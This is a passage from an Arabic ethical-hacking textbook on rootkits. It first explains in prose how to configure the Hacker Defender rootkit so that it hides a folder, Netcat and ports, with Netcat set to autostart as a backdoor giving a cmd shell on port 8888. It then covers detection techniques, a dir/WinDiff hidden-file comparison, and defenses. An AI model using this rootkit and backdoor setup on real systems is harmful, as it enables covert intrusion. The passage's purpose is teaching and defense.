‫إذا ﻛﻧت ﺗﻌرف اﻟﻣﻧﺎﻓذ اﻟﺗﻲ ﺗﺧطط ﻟﻔﺗﺣﮭﺎ‪ ،‬ﯾﻣﻛﻧك إدراﺟﮭﺎ ﺿﻣن اﻟﻣﻘطﻊ ]‪ .[Hidden Ports‬ﺳﺗﻼﺣظ أن ھذا اﻟﻘﺳم ﯾﻧﻘﺳم أﯾﺿﺎ إﻟﻰ‬
‫اﻹدﺧﺎﻻت اﻟﺗﺎﻟﯾﺔ‪ ،TCPO ،TCPI :‬و‪ ":TCPI" .UDP‬ھذا ھو اﻟﻣﻛﺎن اﻟذي ﯾﺗم ﻓﯾﮫ ﺳرد اﻟﻣﻧﺎﻓذ اﻟواردة )‪ (Inbound Ports‬اﻟﺗﻲ ﺗرﯾد‬
‫إﺧﻔﺎﺋﮭﺎ ﻋن اﻟﻣﺳﺗﺧدم‪ .‬إذا ﻛﺎن ﻟدﯾك ﻣﻧﺎﻓذ ﻣﺗﻌددة ﺗرﯾد وﺿﻌﮭﺎ ھﻧﺎ‪ ،‬ﺑﺑﺳﺎطﺔ ﯾﻔﺻل ﺑﯾﻧﮭﻣﺎ ﻓﺎﺻﻠﺔ‪ ":TCPO" .‬ھذا ھو اﻟﻣﻛﺎن اﻟذي ﯾﺳرد ﻓﯾﮫ‬
‫ﻣﻧﺎﻓذ ‪ TCP‬اﻟﺻﺎدرة اﻟﺗﻲ ﺗرﯾد أن ﺗﻛون ﻣﺧﻔﯾﺔ ﻋن اﻟﻣﺳﺗﺧدم‪ ":UDP" .‬ﯾﺳﺗﺧدم ھذا اﻟﻘﺳم ﻟﺗﺣدﯾد ﻣﻧﺎﻓذ ‪ UDP‬اﻟذي ﺗرﯾد إﺧﻔﺎؤھﺎ‪.‬‬

‫اﻵن أﺻﺑﺢ ﻟدﯾك ﻓﻛرة ﻋن ﻛﯾﻔﯾﺔ ﺗﻛوﯾن إﻋدادات ‪ Hacker Defender‬اﻷﺳﺎﺳﯾﺔ‪ ،‬دﻋوﻧﺎ ﻧﻔﺣص اﻷداة ﻓﻲ اﻟﻌﻣل‪ .‬ﻟﮭذا اﻟﻣﺛﺎل‪ ،‬ﺳوف ﻧﻘوم‬
‫ﺑﺗﺛﺑﯾت ‪ Hacker Defender‬ﻓﻲ اﻟﻣﺟﻠد ﻋﻠﻰ ﻣﺣرك اﻷﻗراص اﻟﺟذري \‪ C:‬واﻟذي ﯾﺳﻣﻰ "‪ ."rk‬ﺳوف ﻧﺿﻊ أﯾﺿﺎ ﻧﺳﺧﺔ ﻣن ‪ Netcat‬ﻓﻲ‬
‫ھذا اﻟﻣﺟﻠد‪ .‬ﯾﺑﯾن اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻣﺛﺎل ﻋﻠﻰ ﻣﻠف اﻻﻋداد‪.‬‬

‫ﺳﺗﻼﺣظ أﻧﮫ ﻟﯾس ھﻧﺎك ﺳوى ﺑﺿﻌﺔ أﺳطر إﺿﺎﻓﯾﺔ ﺗم إﺿﺎﻓﺗﮭﺎ إﻟﻰ ﻣﻠف اﻟﺗﻛوﯾن اﻻﻓﺗراﺿﻲ‪ .‬ﻓﻲ ھذا اﻟﻣﺛﺎل‪ ،‬ﻗﻣﻧﺎ ﺑﺈﺿﺎﻓﺔ اﻟﻣﺟﻠد "‪ "rk‬إﻟﻰ‬
‫اﻟﻣﻘطﻊ ]‪ ،[Hidden Table‬واﻟﻣﻠف ﻗﺎﺑل ﻟﻠﺗﻧﻔﯾذ ‪ Netcat‬إﻟﻰ اﻟﻣﻘطﻊ ]‪ ،[Hidden Process‬وأﺧﯾرا‪ ،‬إﻋداد ‪ Netcat‬ﻟﻠﺑدء ﺗﻠﻘﺎﺋﯾﺎ ﻓﻲ‬
‫وﺿﻊ اﻟﻣﻠﻘم وﺗوﻓﯾر طرﻓﯾﺔ ‪ cmd‬ﻓﻲ اﻟﻣﻧﻔذ ‪ 8888‬ﻣن اﻟﮭدف‪ .‬إذا أردت إﺿﺎﻓﺔ طﺑﻘﺔ إﺿﺎﻓﯾﺔ ﻟﺗﺄﻛﯾد اﻻﺧﺗﻔﺎء‪ ،‬ﯾﻣﻛن ذﻟك ﻣن ﺧﻼل إﺿﺎﻓﺔ‬
‫‪ 8888‬إﻟﻰ اﻟﻣﻘطﻊ ]‪.[Hidden Ports‬‬
‫اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﯾظﮭر اﺛﻧﯾن ﻣن اﻟﻠﻘطﺎت ﻗﺑل ﺑدء ﻋﻣل ‪ .hacker Defender‬ﻻﺣظ أن ﻛﻼ ﻣن اﻟﻣﺟﻠد "‪ "rk‬واﻟﺑرﻧﺎﻣﺞ )‪Netcat (nc.exe‬‬
‫ﻣرﺋﻲ‪.‬‬

‫وﻣﻊ ذﻟك‪ ،‬ﺑﻣﺟرد ﺗﺷﻐﯾل‪/‬ﺗﻧﻔﯾذ اﻟﻣﻠف ‪ ،hxdef100.exe‬ﻓﺎن ‪ Rootkits‬ﯾﺻﺑﺢ ﻓﻲ اﻟﻘوة اﻟﻛﺎﻣﻠﺔ‪ .‬ﯾوﺿﺢ اﻟﺷﻛل اﻟﺗﺎﻟﻲ أن ﻛل ﻣن اﻟﻣﺟﻠد‬
‫"‪ "rk‬واﻟﺑرﻧﺎﻣﺞ "‪ "nc.exe‬أﺻﺑﺣﺎ ﻏﯾر ﻣرﺋﯾﯾن ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺳﺗﺧدم‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪444‬‬

‫ﻛﻣﺎ ﺗرون‪ ،‬ﺣﺗﻰ اﻟﺟذور أﺑﺳط ‪ Rootkits‬ﻣﺛل ‪ Hacker Defender‬ﻗﺎدرة ﺗﻣﺎﻣﺎ ﻋﻠﻰ اﺧﻔﺎء اﻟﻣﻠﻔﺎت‪ Rootkits .‬ھﻲ ﻣوﺿوع واﺳﻊ‬
‫وﻧﺣن ﯾﻣﻛن ﺑﺳﮭوﻟﺔ ﺗﺧﺻﯾص ﻛﺗﺎب ﻛﺎﻣل إﻟﻰ اﻟﺗﻔﺎﺻﯾل اﻟﻔﻧﯾﺔ وﺗرﻛﯾﺑﺗﮭﺎ واﻷﻋﻣﺎل اﻟداﺧﻠﯾﺔ‪ .‬ﺗﻛﻧوﻟوﺟﯾﺎ ‪ ،Rootkits‬ﻣﺛل ﻛل اﻟﺑرﻣﺟﯾﺎت‬
‫اﻟﺧﺑﯾﺛﺔ‪ ،‬ﺗواﺻل ﺗطوﯾر ﺑوﺗﯾرة ﻣذھﻠﺔ‪ .‬ﻣن أﺟل إﺗﻘﺎن ‪ ،Rootkits‬ﻓﺳوف ﺗﺣﺗﺎج ﻟﻠﺑدا ﻓﻲ اﻟﻔﮭم اﻟﺳﻠﯾم ﻟﻧواة ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن‬
‫ﺗﻐطﯾﺔ اﻷﺳﺎﺳﯾﺎت‪ ،‬وﯾﺷﺟﻊ ﺑﺷدة ﻟك اﻟﻐوص ﻓﻲ ‪ malware rabbit hole‬وﻧرى ﻛﯾف ﺳﺗﺳﯾر اﻻﻣور اﻟﻌﻣﯾﻘﺔ‪.‬‬

‫‪Detecting Rootkits‬‬
‫ﺗﺻﻧف ﺗﻘﻧﯾﺎت اﻟﻛﺷف ﻋن اﻟروت ﻛت ﻛﺎﻻﺗﻰ‪،cross-view-based ،integrity ،heuristic ،signature ،‬‬
‫و‪.Runtime Execution Path Profiling‬‬
‫‪Signature-based Detection‬‬
‫طرﯾﻘﺔ اﻟﻛﺷف اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ ‪ Signature‬ﺗﻌﻣل وﻛﺄﻧﮭﺎ ﺑﺻﻣﺔ اﻟروت ﻛت‪ .‬ﯾﻣﻛﻧك اﻟﻘﯾﺎم ﺑذﻟك ﻋن طرﯾﻖ ﻣﻘﺎرﻧﺔ ﺗﺳﻠﺳل ﺑﺎﯾت ﻣن ﻣﻠف ﻣﻘﺎرﻧﺔ‬
‫ﻣﻊ ﺗﺳﻠﺳل ﺑﺎﯾت ﻟﻣﻠف آﺧر ﯾﻧﺗﻣﻲ إﻟﻰ ﺑرﻧﺎﻣﺞ ﺧﺑﯾث)‪ . (malware program‬ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب ﻓﻲ اﻟﻐﺎﻟب ﻋﻠﻰ ﻣﻠﻔﺎت اﻟﻧظﺎم‪ .‬اﻟروت‬
‫ﻛت ﺗﻛون داﺋﻣﺎ ﻏﯾر ﻣرﺋﯾﺔ وﯾﻣﻛن اﻟﻛﺷف ﺑﺳﮭوﻟﺔ ﻋﻧﮭﺎ ﻋن طرﯾﻖ ﻓﺣص ذاﻛرة ‪ .kernel‬ﻓرص ﻧﺟﺎح اﻟﻛﺷف اﻟﻘﺎﺋم ﻋﻠﻰ ‪Signature‬‬
‫ﻗﻠﯾﻠﮫ ﻧظرا ﻟﻣﯾل اﻟروت ﻛت ﻹﺧﻔﺎء اﻟﻣﻠﻔﺎت ﻋن طرﯾﻖ ﻗطﻊ ﻣﺳﺎر اﻟﺗﻧﻔﯾذ ﻟﻠﺑراﻣﺞ اﻟﻛﺷف‪.‬‬
‫‪Heuristic Detection‬‬
‫‪ Heuristic detection‬ﯾﻌﻣل ﻋن طرﯾﻖ ﺗﺣدﯾد اﻻﻧﺣراﻓﺎت ﻓﻲ أﻧﻣﺎط ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻌﺎدﯾﺔ أو اﻟﺳﻠوﻛﯾﺎت‪ .‬ھذا اﻟﻧوع ﻣن اﻟﻛﺷف ﯾﻌرف‬
‫أﯾﺿﺎ ﺑﺎﺳم اﻟﻛﺷف ﻋن اﻟﺳﻠوﻛﯾﺎت)‪ Heuristic detection . (behavioral detection‬ﻗﺎدر ﻋﻠﻰ ﺗﺣدﯾد اﻟروت ﻛت اﻟﺟدﯾدة‪ ،‬اﻟﻣﺟﮭوﻟﺔ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪445‬‬

‫ﺳﺎﺑﻘﺎ‪ .‬ھذه اﻟﻘدرة ﺗﻛﻣن ﻓﻲ ﻛوﻧﮫ ﻗﺎدرا ﻋﻠﻰ اﻟﺗﻌرف ﻋﻠﻰ اﻻﻧﺣراﻓﺎت ﻓﻲ أﻧﻣﺎط ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻌﺎدﯾﺔ أو اﻟﺳﻠوﻛﯾﺎت‪ .‬ﺗﻧﻔﯾذ ‪path hooking‬‬
‫ھو أﺣد اﻷﺷﯾﺎء اﻟﺗﻲ ﺗﺳﺑب اﻧﺣراﻓﺎت ﻓﻲ اﻟﺳﻠوك واﻟﺗﻲ ﺗﺳﺑب اﻟﻛﺷف اﻟﻘﺎﺋم ﻋﻠﻰ ‪ heuristic‬ﻟﺗﺣدﯾد اﻟروت ﻛت‪.‬‬
‫‪Integrity-based Detection‬‬
‫ﺗﺗﻣﺛل وظﯾﻔﺔ ‪ Integrity-based detection‬ﻋﻠﻰ اﻟﻣﻘﺎرﻧﺔ ﺑﯾن ﻣﻠﻔﺎت اﻟﻧظﺎم اﻟﺣﺎﻟﻲ وﺳﺟﻼت اﻟﺗﻣﮭﯾد)‪ ، (boot record‬أو ﺻوره ﻣن‬
‫اﻟذاﻛرة ﻣﻊ ﻗواﻋد أﺳﺎﺳﯾﮫ )‪ (base-line‬وﻣوﺛوق ﻓﯾﮭﺎ وﻣﻌروﻓﮫ‪ .‬اﻷدﻟﺔ ﻋﻠﻰ وﺟود أي ﻧﺷﺎط ﺿﺎر ﯾﻣﻛن أن ﯾﻼﺣظ ﻣن ﻗﺑل اﻻﺧﺗﻼف ﺑﯾن‬
‫ﻟﻘطﺎت اﻟﺣﺎﻟﯾﺔ واﻟﻘواﻋد اﻷﺳﺎﺳﯾﺔ‪.‬‬
‫‪Cross-view-based Detection‬‬
‫ﺗﺗﻣﺛل وظﯾﻔﺔ ﺗﻘﻧﯾﺔ ‪ Cross-view-based detection‬ﻋﻠﻰ اﻓﺗراض أن ﻧظﺎم اﻟﺗﺷﻐﯾل ﻗد ﺗم ﺗﺧرﯾﺑﮫ ﻣن ﺧﻼل ﺑﻌض اﻟطرﯾﻖ‪ .‬ھذا ﯾﻘوم‬
‫ﺑﺗﻌداد ﻣﻠﻔﺎت اﻟﻧظﺎم واﻟﻌﻣﻠﯾﺎت وﻣﻔﺎﺗﯾﺢ اﻟﺗﺳﺟﯾل ﻋن طرﯾﻖ اﺳﺗدﻋﺎء ‪ .APls‬ﺛم ﺗﺗم ﻣﻘﺎرﻧﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗم ﺟﻣﻌﮭﺎ ﻣﻊ ﻣﺟﻣوﻋﺔ اﻟﺑﯾﺎﻧﺎت‬
‫اﻟﺗﻲ ﺗم اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻣن ﺧﻼل اﺳﺗﺧدام ﺧوارزﻣﯾﺔ ﺗﻌﺑر ﻣن ﺧﻼل ﻧﻔس اﻟﺑﯾﺎﻧﺎت‪ .‬ﺗﻌﺗﻣد ھذه اﻟﺗﻘﻧﯾﺔ ﻋﻠﻰ ﺣﻘﯾﻘﺔ أن ‪ Hooking API‬أو‬
‫اﻟﺗﻼﻋب ﻓﻲ ﺑﻧﯾﺔ ﺑﯾﺎﻧﺎت اﻟﻛﯾرﻧل ﯾؤدى اﻟﻰ إﻓﺳﺎد اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم إرﺟﺎﻋﮭﺎ ﻣن ﻗﺑل ﻧظﺎم اﻟﺗﺷﻐﯾل ‪ ،APls‬ﻣﻊ آﻟﯾﺎت اﻟﻣﺳﺗوى اﻟﻣﻧﺧﻔض‬
‫ﺗﺳﺗﺧدم ﻹﻧﺗﺎج ﻧﻔس اﻟﻣﻌﻠوﻣﺎت ﻣﺟﺎﻧﺎ ﻣن ‪ DKOM‬أو ‪.hook manipulation‬‬
‫‪Runtime Execution Path Profiling‬‬
‫ﺗﻘﻧﯾﺔ ‪ Runtime Execution Path Profiling‬ﺗﻘﺎرن ﺑﯾن ‪ Runtime Execution Path Profiling‬ﻟﺟﻣﯾﻊ ﻋﻣﻠﯾﺎت اﻟﻧظﺎم‬
‫واﻟﻣﻠﻔﺎت اﻟﻘﺎﺑﻠﺔ ﻟﻠﺗﻧﻔﯾذ‪ .‬اﻟروت ﻛت ﯾﺿﯾف اﻷﻛواد اﻟﺟدﯾد ﺑﺎﻟﻘرب ﻣن ﻣﺳﺎر ﺗﻧﻔﯾذ روﺗﯾن ﻣﻌﯾن‪ ،‬ﺑﻐﯾﺔ زﻋزﻋﺔ اﺳﺗﻘرارھﺎ‪ .‬ﻋدد اﻟﺗﻌﻠﯾﻣﺎت‬
‫اﻟﻣﻧﻔذة ﻗﺑل وﺑﻌد اﻟروﺗﯾن ﻣﻌﯾن ﯾﺗم اﺻطﯾﺎدھﺎ )‪ (hooked‬وﺗﻛون ﻣﺧﺗﻠﻔﺔ إﻟﻰ ﺣد ﻛﺑﯾر‪.‬‬

‫اﻟﺧطوات ﻻﻛﺗﺷﺎف اﻟروت ﻛت ‪Steps For Detecting Rootkits‬‬


‫اﻟﻣﺻدر‪http://research.microsoft.com/ :‬‬
‫ﻧﺗﺑﻊ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ ﻟﻠﻛﺷف ﻋن اﻟروت ﻛت‪:‬‬
‫‪ -1‬ﻧﻘوم ﺑﺗﺷﻐﯾل اﻷواﻣر اﻟﺗﺎﻟﯾﺔ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺻﺎب ﺛم ﺣﻔظ اﻟﻧﺗﺎﺋﺞ‪.‬‬
‫‪dir /s /b /ah‬‬
‫‪dir /s /b /a-h‬‬
‫‪ -2‬ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﻧظﺎم ﻣن ﺧﻼل أﺳطواﻧﺔ ﺗﺷﻐﯾل ﻏﯾر ﻣﺻﺎﺑﮫ )‪(Boot into a clean CD‬ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل اﻷواﻣر اﻟﺗﺎﻟﯾﺔ ﺛم ﺣﻔظ‬
‫اﻟﻧﺗﺎﺋﺞ ﻓﻲ ﻣﻠف‪.‬‬
‫‪dir /s /b /ah‬‬
‫‪dir /s /b /a-h‬‬
‫‪ -3‬ﻧﻘوم ﺑﺗﺷﻐﯾل اﺻدار ﻏﯾر ﻣﺻﺎب ﻣن ‪ WinDiff‬ﻣن ﺧﻼل أﺳطواﻧﺔ ﺗﺷﻐﯾل ‪ CD‬ﻋﻠﻰ ﻧﺗﺎﺋﺞ اﻟﺧطوﺗﯾن اﻟﺳﺎﺑﻘﺗﯾن ﻻﻛﺗﺷﺎف اﻟﻣﻠﻔﺎت‬
‫اﻟﻣﺧﻔﺎة‪.‬‬
‫ﻣﻠﺣوظﮫ‪ :‬ﯾﻣﻛن أن ﯾﻛون ھﻧﺎك ﺑﻌض اﻟﻧﺗﺎﺋﺞ اﻟﻛﺎذﺑﺔ‪ .‬أﯾﺿﺎ‪ ،‬ھذا ﻻ ﯾﻛﺷف ﻋن ‪ stealth software‬اﻟذي ﯾﺧﻔﻲ ﻓﻲ ‪ ،BIOS‬ﺑطﺎﻗﺔ اﻟﻔﯾدﯾو‬
‫‪ ،EEPROM‬ﻗطﺎﻋﺎت اﻟﻘرص ﺳﯾﺋﺔ)‪ ، (bad disk sector‬واﻟﺟداول اﻟﺑدﯾﻠﺔ ﻟﻠﺑﯾﺎﻧﺎت‪ ،‬اﻟﺦ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪446‬‬

‫‪Defending Against Rootkits‬‬


‫ﻣن اﻟﻣﮭم أن ﻧﻔﮭم أﻧﮫ ﻣن أﺟل ﺗﻛوﯾن وﺗﺛﺑﯾت اﻟروت ﻛت‪ ،‬ﻓﺎﻧﮫ ﺑﺗطﻠب اﻟوﺻول اﻹداري إﻟﻰ اﻟﻧظﺎم اﻟﮭدف‪ .‬وﺑﺎﻟﺗﺎﻟﻲ ﻓﺎن اﻟﺧطوة اﻷوﻟﻰ ھﻲ‬
‫اﻟﮭﺟوم اﻟذي ﯾؤدي إﻟﻰ ھذا اﻟوﺻول وﻟﻛﻧﮫ ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن ﯾﻛون ﺻﺎﺧﺑﺎ وﯾﺳﮭل ﻛﺷﻔﮫ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ ﻓﺈن اﻟﺧطوة اﻷوﻟﻰ ﻓﻲ ﺗﺟﻧب اﻟروت‬
‫ھو ﺗﻘﻠﯾل اﻟﺻﻼﺣﯾﺎت ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺳﺗﺧدﻣﯾن‪ .‬ھﻧﺎك ﻋدد ﻗﻠﯾل ﺟدا ﻣن اﻟﻣﺷروﻋﺎت اﻟﺗﻲ ﯾﺳﻣﺢ ﻓﯾﮭﺎ ﻟﻠﻣﺳﺗﺧدﻣﯾن اﻟﺗﺷﻐﯾل ﻣﻊ ﺣﻘوق اﻟﻣﺳؤول‬
‫اﻟﻛﺎﻣل‪ .‬ﻟذﻟك اﻻن ﯾوﻓر ﻣﻌظم أﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟﺣدﯾﺛﺔ اﻟﻘدرة ﻋﻠﻰ رﻓﻊ اﻻﻣﺗﯾﺎزات ﻣؤﻗﺗﺎ ﻣﻊ اﻻواﻣر " ‪ " su‬أو " ‪run as‬‬
‫‪."administrator‬‬

‫ﻋﻠﻰ اﻟرﻏم ﻣن أن اﻟﻌدﯾد ﻣن وظﯾﻔﺔ اﻟروت ﻛت ﺗﻛون ﻋﻠﻰ ﻣﺳﺗوى اﻟﻛﯾرﻧل وﻟﮭﺎ اﻟﻘدرة ﻋﻠﻰ ﺗﺟﻧب اﻟﻛﺷف ﻋن طرﯾﻖ ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ‬
‫اﻟﻔﯾروﺳﺎت‪ ،‬ﻟذﻟك ﻓﺎن ﺗرﻛﯾب واﺳﺗﺧدام وﺣﻔظ اﻟﺑرﻧﺎﻣﺞ ﻣﺣدﺛﮫ اﻟﻰ ﻣﺎ ﯾﺻل إﻟﻰ ﺗﺎرﯾﺦ اﻟﯾوم أﻣر ﺑﺎﻟﻎ اﻷھﻣﯾﺔ‪ .‬ﺑﻌض اﻟروت ﻛت‪ ،‬وﺧﺻوﺻﺎ‬
‫اﻹﺻدارات اﻟﻘدﯾﻣﺔ واﻷﻗل ﺗﻌﻘﯾدا ﻣﻧﮭﺎ‪ ،‬ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ وﺗﻧظﯾﻔﮭﺎ ﻣن ﻗﺑل ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت اﻟﺣدﯾﺛﺔ‪.‬‬
‫ﻣن اﻟﻣﮭم أﯾﺿﺎ ﻣراﻗﺑﺔ ﺣرﻛﺔ اﻟﻣرور اﻟﻘﺎدﻣﺔ اﻟﻰ واﻟﺧروج ﻣن اﻟﺷﺑﻛﺔ‪ .‬اﻟﻌدﯾد ﻣن اﻟﻣﺳؤوﻟﯾن ﯾﻛون ﻣﮭﺗﻣﯾن ﺑرﺻد وﻋرﻗﻠﺔ ﺣرﻛﺔ اﻟﻣرور‬
‫واﻟﺗﻲ ﺗﺻب ﻓﻲ اﻟﺷﺑﻛﺔ‪ .‬اﻧﮭم ﯾﻘﺿون اﻷﯾﺎم وﺣﺗﻰ أﺳﺎﺑﯾﻊ ﻟﺗﺣدﯾد وﻣﻧﻊ ﺣرﻛﺔ اﻟﻣرور اﻟواردة‪ .‬ﻓﻲ ﻧﻔس اﻟوﻗت‪ ،‬ﻛﺛﯾر ﻣن ھؤﻻء اﻟﻣﺳﺋوﻟﯾن‬
‫ﯾﺗﺟﺎھﻠوا ﺗﻣﺎﻣﺎ ﻛل ﺣرﻛﺔ اﻟﻣرور اﻟﺻﺎدرة‪ .‬رﺻد ﺣرﻛﺔ اﻟﻣرور اﻟﺻﺎدرة ﯾﻌﺗﺑر أﻣرا ﺣﯾوﯾﺎ ﻓﻲ اﻟﻛﺷف ﻋن اﻟروت ﻛت وﻏﯾرھﺎ ﻣن اﻟﺑراﻣﺞ‬
‫اﻟﺿﺎرة‪ .‬ﯾﺳﺗﻐرق وﻗﺗﺎ طوﯾﻼ ﻟﻣﻌرﻓﺔ اﻟﻣزﯾد ﻋن ﺗﺻﻔﯾﺔ اﻟﺧروج‪.‬‬

‫ﺗﻛﺗﯾك أﺧر ﺟﯾد ﻟﻠﻛﺷف ﻋن اﻟروت ﻛت و‪ backdoor‬ھو اﻟﻔﺣص ﺑﺎﻧﺗظﺎم ﻟﻣﻧﺎﻓذ اﻟﻧظم اﻟﺧﺎﺻﺔ ﺑك‪ .‬إذا وﺟدت ﺑﻌض ﻣن ﻣﻧﺎﻓذ اﻟﻧظﺎم اﻟﻐﯾر‬
‫ﻣﻌروﻓﮫ ﻣﻔﺗوﺣﺔ‪ ،‬ﺗﺄﻛد ﻣن ﺗﻌﻘب أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺷﺧﺻﯾﺔ وﺗﺣدﯾد اﻟﺧدﻣﺔ اﻟﻣﺎرﻗﺔ‪ .‬أﯾﺿﺎ ﻣن ﺑﻌض اﻟﺗﻘﻧﯾﺎت اﻟﻐﻧﯾﺔ ﻋن اﻟﺗﻌرﯾف ھﻲ ﺗﺣﻠﯾل‬
‫ﻣﻠف اﻟﺳﺟل واﻟﺗﻲ ﺗﻌﺗﺑر ﺟزءا ً ﻣﮭﻣﺎ ﻣن إدارة اﻟﻣﺧﺎطر‪ .‬ﻗد ﯾﻣﻠك اﻟﻣﮭﺎﺟم أﯾﺿﺎ ﺑراﻣﺞ اﻟﻧﺻﯾﺔ )‪ (shell script‬أو أدوات واﻟﺗﻲ ﯾﻣﻛن أن‬
‫ﺗﺳﺎﻋده ﻋﻠﻰ ﺗﻐطﯾﺗﮫ أو ﺗﻐطﯾﺔ ﻣﺳﺎرات اﻟﮭﺟوم‪ ،‬وﻟﻛن ﺑﺎﻟﺗﺄﻛﯾد ﺳوف ﯾﻛون ھﻧﺎك ﻋﻼﻣﺎت ﻣﻧﺑﮭﺔ أﺧرى ﯾﻣﻛن أن ﺗؤدي إﻟﻰ ﺗداﺑﯾر ﻣﺿﺎدة‬
‫اﺳﺗﺑﺎﻗﯾﺔ‪ ،‬وﻟﯾﺳت ﻣﺟرد رد اﻟﻔﻌل‪.‬‬

‫اﻟﺗدﺑﯾر اﻟﻣﺿﺎد ھو رد اﻟﻔﻌل ﻟﻠﻧﺳﺦ اﻻﺣﺗﯾﺎطﻲ ﻟﻛﺎﻓﺔ اﻟﺑﯾﺎﻧﺎت اﻟﮭﺎﻣﺔ ﺑﺎﺳﺗﺛﻧﺎء ‪ ،binaries‬واﻟذھﺎب ﻹﺟراء ﺗﺛﺑﯾت ﻧظﯾف ﻣن ﻣﺻدر ﻣوﺛوق‬
‫ﺑﮫ‪ .‬ﯾﻣﻛن ﻟﻠﻣرء اﻧﺷﺎء ﻣﻠﺧص ﻟﻔﺣص اﻷﻛواد واﻟﺗﻲ ﺗﻌﺗﺑر ﻛوﺳﯾﻠﺔ ﻟﻠدﻓﺎع ﺟﯾدة ﺿد أدوات ﻣﺛل اﻟروت ﻛت‪ MD5sum.exe .‬ﯾﻣﻛﻧﮫ اﻧﺷﺎء‬
‫ﺑﺻﻣﺔ ﻟﻠﻣﻠﻔﺎت وذﻟك ﻟﻣﻼﺣظﮫ أي ﻣن اﻻﻧﺗﮭﺎﻛﺎت ﻋﻧد ﺣدوث أي ﻣن اﻟﺗﻐﯾﯾرات‪ .‬ﻟﻠدﻓﺎع ﺿد اﻟروت ﻛت‪ ،‬ﯾﻣﻛن اﺳﺗﺧدام ﺑراﻣﺞ ﻓﺣص ﺳﻼﻣﺔ‬
‫ﻣﻠﻔﺎت اﻟﻧظﺎم اﻟﮭﺎﻣﺔ‪ .‬ﺣﯾث ﺗﺗوﻓر اﻟﻌدﯾد ﻣن اﻷدوات واﻟﺑراﻣﺞ واﻟﺑرﻣﺟﯾﺎت واﻟﺗﻘﻧﯾﺎت اﻟﻣﺳﺗﺧدﻣﺔ ﻟﻠﺗﺣﻘﻖ ﻣن اﻟروت ﻛت‪.‬‬

‫ﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض اﻷﺳﺎﻟﯾب اﻟﺗﻲ ﯾﺗم اﻋﺗﻣﺎدھﺎ ﻟﻠدﻓﺎع ﺿد اﻟروت ﻛت ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬

‫إﻋﺎدة ﺗﺛﺑﯾت ﻧظﺎم اﻟﺗﺷﻐﯾل‪/‬اﻟﺗطﺑﯾﻘﺎت ﻣن ﻣﺻدر ﻣوﺛوق ﺑﻌد اﻟﻧﺳﺦ اﻻﺣﺗﯾﺎطﻲ ﻟﻠﺑﯾﺎﻧﺎت اﻟﮭﺎﻣﺔ‪.‬‬ ‫‪-‬‬
‫ﺗﺣدﯾد اﻟﻣوظﻔﯾن ذوي اﻟﻣﺳؤوﻟﯾﺎت اﻟﻐﯾر ﻣﺣدودة‪.‬‬ ‫‪-‬‬
‫إﺟراءات اﻟﺗﺛﺑﯾت اﻵﻟﻲ ﻣوﺛﻘﺔ ﺗوﺛﯾﻘﺎ ً ﺟﯾدا ﺑﺣﺎﺟﺔ إﻟﻰ أن ﯾﺗم اﻟﺣﻔﺎظ ﻋﻠﯾﮭﺎ‪.‬‬ ‫‪-‬‬
‫ﺗﺛﺑﯾت ﺷﺑﻛﺔ اﻻﺗﺻﺎل واﻟﺿﯾﻔﯾن ﻣﺳﺗﻧدا إﻟﻰ ﺟدران اﻟﺣﻣﺎﯾﺔ‪.‬‬ ‫‪-‬‬
‫اﺳﺗﺧدام ﻧظﺎم ﻣﺻﺎدﻗﺔ ﻗوي‪.‬‬ ‫‪-‬‬
‫اﻟﻣﺗﺟر اﻟﺗواﻓر ﻻﺳﺗﻌﺎدة ﺛﻘﺔ وﺳﺎﺋل اﻹﻋﻼم‬ ‫‪-‬‬
‫زﯾﺎدة اﻷﻣﺎن وﺗﺻﻌﯾب ﻣﺣطﺔ اﻟﻌﻣل أو اﻟﻣﻠﻘم ﺿد اﻟﮭﺟوم‪.‬‬ ‫‪-‬‬
‫ﺗﺣدﯾث ‪ patches‬ﻟﻧظم اﻟﺗﺷﻐﯾل واﻟﺗطﺑﯾﻘﺎت‪.‬‬ ‫‪-‬‬
‫ﯾﺟب ﺗﺣدﯾث ﺑرﻣﺟﯾﺎت اﻟﺣﻣﺎﯾﺔ ﺿد اﻟﻔﯾروﺳﺎت وﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس ﺑﺎﻧﺗظﺎم‪.‬‬ ‫‪-‬‬
